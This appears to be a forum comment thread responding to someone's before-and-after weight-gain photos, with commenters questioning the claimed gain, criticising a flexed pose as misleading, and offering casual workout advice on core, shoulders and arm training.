I can see a difference, but is is only modest at best.

Take that one guys advice, do some (A LOT) core work. Sad abs/obliques are sad. Plus, those are some of your largest muscle groups, bulking them up gets huge poundage.

And do some delts. Their tiny, too

First off, I don't really think you went directly from 110 to 150 <from those pictures>. The pictures show maybe 130-150 at the most, provided you are 150 in the second pic.

when you take pictures of yourself to prove you gained weight, i'd recommend against the puffed out shoulder raise pose you're using.

it can make you look biugger than you actually are and is misleading.

take a normal shot of you relaxed.

I can do one photo of me relaxed and then one of me flexing and spreading my shoulders and at the right angle you would think i gained an extra 15 pounds

keep up the good work op the only thing is your arms are being left behind man. You need to up the resistance on the weights that involve your arms. Looks like your doing to many reps at low weights, swap it round do less reps at higher weights remember last rep should be almost impossible. You should see some real improvements in your arms in minimal time.
